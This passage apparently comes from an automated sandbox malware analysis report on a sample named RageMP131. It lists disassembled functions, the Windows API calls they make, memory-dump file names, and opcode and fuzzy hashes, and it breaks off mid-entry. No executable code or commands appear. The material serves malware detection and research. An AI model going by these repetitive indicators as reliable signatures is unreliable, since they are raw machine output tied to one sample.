Function 04E109F9 Relevance: 1.7, APIs: 1, Instructions: 155COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E10AB8

Memory Dump Source

Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: dee5d9235b9068f500557fe2ff39a95556005ca10e1feb0f6593f2dd4ee64a0b
Instruction ID: 2e060bcf276db5e6e52779a65a512b38b9e79ca8effff7de62adb206beaf3043
Opcode Fuzzy Hash: dee5d9235b9068f500557fe2ff39a95556005ca10e1feb0f6593f2dd4ee64a0b
Instruction Fuzzy Hash: 4731EFF73CD115EDE14685411B50EF626AEE7CB334730A4A3B40BA6E62F3842AC97421

Function 04E10A36 Relevance: 1.7, APIs: 1, Instructions: 153COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E10AB8

Memory Dump Source

Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 55c29e76ff5ea39db8f6171437a8a583f9ffec9c3f3a9e45444319eb52cbe763
Instruction ID: b2a5d744e1ff63be9dea819d2b72dc946e4e6adc7ac54daeba275c147f27cbda
Opcode Fuzzy Hash: 55c29e76ff5ea39db8f6171437a8a583f9ffec9c3f3a9e45444319eb52cbe763
Instruction Fuzzy Hash: 023136F73CD211EDF10285551B50EF626AEE7D7334730A4A3A40BD6E22F3846AC93861

Function 04E10A22 Relevance: 1.6, APIs: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E10AB8

Memory Dump Source

Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 1d3a1e70f1957552c1f6179c4c814402b0a1ea14ffee7f297cd87807c81d3604
Instruction ID: c0a67cc34f0c237795ce37095ca1f8e867c3f98d434aae957ed77b954425c9f3
Opcode Fuzzy Hash: 1d3a1e70f1957552c1f6179c4c814402b0a1ea14ffee7f297cd87807c81d3604
Instruction Fuzzy Hash: 3831E2F73CD215EDE101C9511B50EF626ADE7DB334730A4A3B40BE6E62F3942AC96421

Function 002DB6B0 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 002DB801

Memory Dump Source

Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 617db6ab8b8d5904d46ca521fca4f6ec3a4692538c761b60814e4c8ab9871f96
Instruction ID: 5441e7ef84b5f53079044b1ec15c9aaa8963aaa47863f86671376b015b82f037
Opcode Fuzzy Hash: 617db6ab8b8d5904d46ca521fca4f6ec3a4692538c761b60814e4c8ab9871f96
Instruction Fuzzy Hash: D8410372910115DBDB06DF68D8916AEB7E9EF84350F16026AE805EB341D730EE2187E1

Function 04E10AEE Relevance: 1.6, APIs: 1, Instructions: 130COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E10AB8

Memory Dump Source

Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 770ef8e3631b4dc34dbd0e6974212a7eb37f7b7f827fde24421ade50819c9a86
Instruction ID: 505d88f3a7b3a46b0b67bec5c9feb1c0e17ccf2c7928a222051d0dca6b28fda5
Opcode Fuzzy Hash: 770ef8e3631b4dc34dbd0e6974212a7eb37f7b7f827fde24421ade50819c9a86
Instruction Fuzzy Hash: 422127B73CE200EDF115C9515B50EFA676DE7C7334730A4A2E407D2961F3906AC96922

Function 04E10A63 Relevance: 1.6, APIs: 1, Instructions: 130COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E10AB8

Memory Dump Source

Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 813483ba0bfe3996db9a46f99acdb626f7c63ef1f3586b454c6e153359966da2
Instruction ID: 68f519bdfe21465640fd346999d33e349661a98bcb9199b6a781c97871b5a1ad
Opcode Fuzzy Hash: 813483ba0bfe3996db9a46f99acdb626f7c63ef1f3586b454c6e153359966da2
Instruction Fuzzy Hash: FA21A0FB3CD215EDE11189511B50EF6666DE7CB234730A4A2B407D6A21F3846AC96822

Function 04E10A7A Relevance: 1.6, APIs: 1, Instructions: 130COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E10AB8

Memory Dump Source

Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 9155cd5a608dd921b3d8c62270fa70d077fef1578a3be5a2cdf9957a1d939fdf
Instruction ID: fffdaa0800298e36cace2be039dbdd97b416139e18d4cb8e14cee563e2ffafd5
Opcode Fuzzy Hash: 9155cd5a608dd921b3d8c62270fa70d077fef1578a3be5a2cdf9957a1d939fdf
Instruction Fuzzy Hash: DF2139B73CE241EDF11589511750EFA6B6DE7C7334730A4A2E40792962F3942AC96922

Function 04E10AB0 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E10AB8

Memory Dump Source

Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: d19a364a75ab406c57c1ce375a55173562bfe1864ae789a60725318ce5960fc6
Instruction ID: a0ce99484d2b2499158e0f02cdc2bd554c46680dea10e252a8c1db8f75b99cf0
Opcode Fuzzy Hash: d19a364a75ab406c57c1ce375a55173562bfe1864ae789a60725318ce5960fc6
Instruction Fuzzy Hash: 782123B73CD115ECE1018A801750EF6666DE7CB334730A4A2F407E2D22F3802AC93876

Function 003621D2 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,003620B9,00000000,CF830579,003A1090,0000000C,00362175,0035627D,?), ref: 00362228

Memory Dump Source

Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 60a1c3a25f4b1f95ee331cf92a018c741e58db80dec6ff25d630cf6715c43de3
Instruction ID: df5dbf59c979e9c004d0bead54d92eb03ab5db389fbf8ad16e7fb4060ca43ba6
Opcode Fuzzy Hash: 60a1c3a25f4b1f95ee331cf92a018c741e58db80dec6ff25d630cf6715c43de3
Instruction Fuzzy Hash: A9116633709A1417D6232374AC51B7F2B898F83738F778A19FA189F1DADA719C814191

Function 0035B71C Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,003A0D48,0034BC71,00000002,0034BC71,00000000,?,?,?,0035B826,00000000,?,0034BC71,00000002,003A0D48), ref: 0035B758

Memory Dump Source

Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 53c3af6c1cf2bfd9c6dd8f0ef1604c6ede498b2c3df49efc524ab25068249f8c
Instruction ID: 2c20a63aec701815330d38a7ed07adc87dabaa970cbe34b664064a8dfab32ac7
Opcode Fuzzy Hash: 53c3af6c1cf2bfd9c6dd8f0ef1604c6ede498b2c3df49efc524ab25068249f8c
Instruction Fuzzy Hash: DB01D632614615AFCF069F59CC41C9E7B69DF85325B250208FC519B2A1EB71ED419BD0

Function 0034C950 Relevance: 1.6, APIs: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00271FDE

Memory Dump Source

Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: f4cb14645893d106bb9267af0bf2f64ca02ae6c1ed09eef8faaeb7f6458880cd
Instruction ID: d98d723dc47e0134ebda18c26e577aef07dfab764ff735bc4e1a36079e55243a
Opcode Fuzzy Hash: f4cb14645893d106bb9267af0bf2f64ca02ae6c1ed09eef8faaeb7f6458880cd
Instruction Fuzzy Hash: C301D63981030DB7CB26AEA8DC0189977EC9E06360B508525F918AE9A1FB70FA648795

Function 00363AB3 Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,0034ADBC,?,?,00363439,00000001,00000364,?,00000006,000000FF,?,0034DD3B,?,?,?,?), ref: 00363AF4

Memory Dump Source

Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: cbf76a132a306081f86ca24bfb4fc4d36330ddcba0f8c3aa6fa9a7328cb89f45
Instruction ID: 88d8d3b3213c83e4651352866c379e3c06becb1b816a8ef657d610d0f4b74b51
Opcode Fuzzy Hash: cbf76a132a306081f86ca24bfb4fc4d36330ddcba0f8c3aa6fa9a7328cb89f45
Instruction Fuzzy Hash: B4F0E93260962466DB236E66CC01F9B3B8C9F41760B2AC111EC449B09CCB20DE0092E5

Function 003644ED Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,0034DD3B,?,?,?,?,?,00272D8D,0034ADBC,?,?,0034ADBC), ref: 0036451F

Memory Dump Source

Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f08e5df31d0e3606fd9558ceb1a10bb2910443ec4be01c6eabc4459e09dce031
Instruction ID: d5a8281267f64e5434b8f01aa46f3e4686ceb5b82d706732d51ac09fb7279c29
Opcode Fuzzy Hash: f08e5df31d0e3606fd9558ceb1a10bb2910443ec4be01c6eabc4459e09dce031
Instruction Fuzzy Hash: D0E09B3194171157D6233A659C01B5B3A8DDF437B1F179121EE469B0D9DA50CD0041AA

Function 04E20072 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.3744640469.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e20000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12d9cac952fb9c5dd7d0f31804fc726fef01be68daf56ddb514c3f418a82ef24
Instruction ID: d6b6fd8a14ac1dc4bbb491a6fb58dd72c70ef546d0bd924391bbef1cca6209d0
Opcode Fuzzy Hash: 12d9cac952fb9c5dd7d0f31804fc726fef01be68daf56ddb514c3f418a82ef24
Instruction Fuzzy Hash: B021D2EB24C170BDF20285512B58EFB6B2EE3D67347309557FA02D45C3E28A1A8E7132

Function 04E20000 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.3744640469.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e20000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d6eeb62d8b9bec524e399760a4010c729a0f6d9e5aac2cf416930b49a82aeed
Instruction ID: 9dfdd20ed8f87ad931f89f64a18153df2252e64b3e0a99313ac15d37baa3e20a
Opcode Fuzzy Hash: 7d6eeb62d8b9bec524e399760a4010c729a0f6d9e5aac2cf416930b49a82aeed
Instruction Fuzzy Hash: BB212AEB34C134BDF21284426B14EFA6A2EE3C67747319827FA07D5582F2896A4D7071

Function 04E2000A Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.3744640469.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e20000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca465a41762601d08956737c0ec7a623c53a309fc8df381eea998bc6151981c7
Instruction ID: b7005e6c5c274e97c7b6f2c1908297d3a528027550e19afec7ef85d5745ae443
Opcode Fuzzy Hash: ca465a41762601d08956737c0ec7a623c53a309fc8df381eea998bc6151981c7
Instruction Fuzzy Hash: 74212CEB24C134BDF25284426B14EFA6B2DE3C67747319927FA07D4582F2895A4D7131

Function 04E2001D Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.3744640469.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e20000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c330c246f8c5485ef6da65ca9ced00138ddb00fe3fb84c1eab1f0bab4d9e53e4
Instruction ID: 4630a5824a6ea115f71fb8ae3e0e1d1841e8651d63b8e84a9ce41743b3a8921c
Opcode Fuzzy Hash: c330c246f8c5485ef6da65ca9ced00138ddb00fe3fb84c1eab1f0bab4d9e53e4
Instruction Fuzzy Hash: CA2130EB24C130BDF21284426B14EF76B2DE3C67747319927FA07E5982F2895A4D7071

Function 04E20022 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.3744640469.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e20000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e26439f139d78f267edc89e2fc728f8de3fbf6d11dcb4a5ac06d1dd9a167c923
Instruction ID: 648ef8447bc2c77e40d6c509449142acf7dc1ba963ee362d7e17a4e1641f78e4
Opcode Fuzzy Hash: e26439f139d78f267edc89e2fc728f8de3fbf6d11dcb4a5ac06d1dd9a167c923
Instruction Fuzzy Hash: 24213DEB34C130BCF15285426B14EFA6B2DE3C67747309927FA07E4982F2896A5D7171

Function 04E2005C Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.3744640469.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e20000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5b01c265fdd4db75941c60eb41e530dc72fdd69940d8f087c3d6a7c243e5252
Instruction ID: ac763baf90d56e543f0eb444432721afbb20b3784817c35accc64f7229586d45
Opcode Fuzzy Hash: c5b01c265fdd4db75941c60eb41e530dc72fdd69940d8f087c3d6a7c243e5252
Instruction Fuzzy Hash: AA210EEB24C130BCF25285826B14EF75B2EE3C67707319527F907E4986F2891A5D7031

Function 04E200B2 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.3744640469.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e20000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bb4d05aeab895e0f7676c755152342539f63721382161fe66e409c4fff98f69
Instruction ID: 0e0f278123cc8fb61961b21780e874cf786fa2e980d17c45bba3f5242ac9145d
Opcode Fuzzy Hash: 6bb4d05aeab895e0f7676c755152342539f63721382161fe66e409c4fff98f69
Instruction Fuzzy Hash: 1A1191EB28C130BCF10284526B18AF66A2EF3C67307319527F907E4982F3891B8D7131

Function 04E200C6 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.3744640469.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e20000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acef598aca3e400464e1052567681eba8fd2885d7016f469a78721904179bd13
Instruction ID: 07969448b73629fd546ffa33dc7bb8e8f58698c07339e38901fafe206d3db68f
Opcode Fuzzy Hash: acef598aca3e400464e1052567681eba8fd2885d7016f469a78721904179bd13
Instruction Fuzzy Hash: 981130EB28C130BDF15289426B18AF76A2EF3D67707319526F907E4582F3891A4D7131

Function 04E2010C Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.3744640469.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e20000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df17d9899e454e7d6bd63c119997f9b07ab87665e6a47b9a0c0da35fe4db0a83
Instruction ID: a86d91a87d5fae3274e58d9c1cc020a3098595fc6f72cb4e45cca51604576cf4
Opcode Fuzzy Hash: df17d9899e454e7d6bd63c119997f9b07ab87665e6a47b9a0c0da35fe4db0a83
Instruction Fuzzy Hash: 390140EB68C130BCF24285562B58AFA6B2EE2C27703319526F943E0987F3891A4D7031

Function 04E2014D Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.3744640469.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e20000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96824d5d59fb784732bca3e4674d1aa37e6f25934a41a915c1ba5701be779f9f
Instruction ID: 00d7f2bf7906067432c7c7f6617282529fec902a4f4a45fbb87f1e0f565ca0fe
Opcode Fuzzy Hash: 96824d5d59fb784732bca3e4674d1aa37e6f25934a41a915c1ba5701be779f9f
Instruction Fuzzy Hash: 37F054E768C130ACE242844627556F55A2EB3D6730371A613F507E5D87B2856B9D7031

Function 04E20156 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.3744640469.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_4e20000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bd855233e75f2aa0f67916bee38a135a3268e09b0135d7915ecab6386e057db
Instruction ID: c4238f225e31754842a682a039e2f604e00cedab0e3dd9ff19e0122af48ca406
Opcode Fuzzy Hash: 0bd855233e75f2aa0f67916bee38a135a3268e09b0135d7915ecab6386e057db
Instruction Fuzzy Hash: 88F0BEA738C130BCE242894627586F95B2EB3D6330330A613F503E0987B7892B9D7131

Function 04E20170 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

